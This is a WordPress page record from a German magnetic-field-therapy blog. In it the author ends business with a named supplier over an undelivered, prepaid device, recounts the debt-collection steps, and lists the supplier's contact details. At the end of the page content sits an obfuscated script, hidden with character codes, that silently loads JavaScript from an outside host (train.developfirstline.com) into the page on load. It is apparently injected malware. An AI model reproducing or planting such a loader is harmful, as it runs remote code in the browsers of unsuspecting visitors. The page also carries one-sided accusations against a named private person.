{"id":6493,"date":"2017-08-21T14:17:03","date_gmt":"2017-08-21T14:17:03","guid":{"rendered":"http:\/\/blog.energiemedizin.de\/?page_id=6493"},"modified":"2019-03-25T12:07:24","modified_gmt":"2019-03-25T12:07:24","slug":"zusammenarbeit-mit-emg-inge-werner-beendet","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=6493","title":{"rendered":"Zusammenarbeit mit EMG Inge Werner beendet"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\"><strong>Ich habe lange gehofft, dass es nicht soweit kommt. Jetzt ist es aber amtlich: Meine Zusammenarbeit mit der Firma EMG Inge Werner ist beendet. <\/strong><\/span><br \/>\n<span style=\"color: #000000;\"> <strong>Leider ist eine unsch\u00f6ne Handlung der Inhaberin Frau Werner der Ausl\u00f6ser. <\/strong><strong>Ich habe im November 2016 ein EMG Profi bei Frau Werner bestellt und auch sofort bezahlt. Dieses Ger\u00e4t hat mir Frau Werner nicht ausgeliefert und mich <\/strong><strong>immer wieder mit Ausreden hingehalten. Im Fr\u00fchjahr 2017 habe ich dann die R\u00fcckzahlung meines Geldes gefordert. Auch hier wurden von Frau Werner immer wieder Auszahlungstermine festgelegt, die nicht eingehalten wurden. Aufgrund meiner st\u00e4ndigen Anfragen und Forderungen nach meinem Geld hat Frau Werner die Zusammearbeit mit mir Anfang Juli 2017 beendet. Ich sah mich deshalb gezwungen am 24.07.2017 bei der Polizei Anzeige wegen Warenkreditbetrugs zu erstatten. Die Staatsanwaltschaft hat das Ermittlungsverfahren eingestellt, da der Hersteller der Ger\u00e4te nicht geliefert hat.<br \/>\nIch habe daraufhin einen Vollstreckungsbescheid beim Amtsgericht Lichtenberg erwirkt. Eine Konten- bzw. Rentenpf\u00e4ndung war nicht m\u00f6glich, da noch mehrere Gl\u00e4ubiger vorhanden waren.<br \/>\nFrau Werner hat erst nach Eintragung einer Zwangshypothek den f\u00e4lligen Betrag nach mehr als 15 Monaten nach Erteilung des Vollstreckungsbescheides am 14.03.2019 zur\u00fcckgezahlt.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Sollten Sie in Zukunft Fragen zu Ihrem Ger\u00e4t (z.B. Garantieleistungen) haben, wenden Sie sich bitte an:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Fa. EMG Inge Werner <\/strong><\/span><br \/>\n<span style=\"color: #000000;\"> <strong>Manetstr. 26<\/strong><\/span><br \/>\n<span style=\"color: #000000;\"> <strong>13053 Berlin,<\/strong><\/span><br \/>\n<span style=\"color: #000000;\"> <strong>Tel.: (030) 9821694<\/strong><\/span><br \/>\n<span style=\"color: #000000;\"> <strong>Mobil: (0173) 3683300<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Bei Fragen zur Anwendung der EMG-Systeme und zur Magentfeldtherapie allgemein, k\u00f6nnen Sie sich gerne wie immer bei mir melden.<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Achim Steffan &amp; Team<\/strong><\/span><\/p>\n<h5><span style=\"color: #000000;\">\u00a0<\/span><\/h5>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-5382\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2010\/10\/Banner-Berlin.jpg\" alt=\"\" width=\"473\" height=\"160\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2010\/10\/Banner-Berlin.jpg 473w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2010\/10\/Banner-Berlin-300x101.jpg 300w\" sizes=\"(max-width: 473px) 100vw, 473px\" \/><script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Ich habe lange gehofft, dass es nicht soweit kommt. Jetzt ist es aber amtlich: Meine Zusammenarbeit mit der Firma EMG Inge Werner ist beendet. Leider ist eine unsch\u00f6ne Handlung der Inhaberin Frau Werner der Ausl\u00f6ser. Ich habe im November 2016 ein EMG Profi bei Frau Werner bestellt und auch sofort bezahlt. Dieses Ger\u00e4t hat [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1268,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6493"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6493"}],"version-history":[{"count":10,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6493\/revisions"}],"predecessor-version":[{"id":6671,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6493\/revisions\/6671"}],"up":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/1268"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}